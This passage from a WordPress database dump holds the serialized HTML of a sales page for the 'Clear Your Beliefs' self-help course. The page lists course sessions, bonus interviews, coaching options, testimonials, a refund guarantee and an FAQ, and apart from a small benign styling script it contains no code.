class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.</p>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to font color="blue" ><a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, BeliefCloset.com, or ConfusedAboutLove.com.</p>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1602, 2041, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come 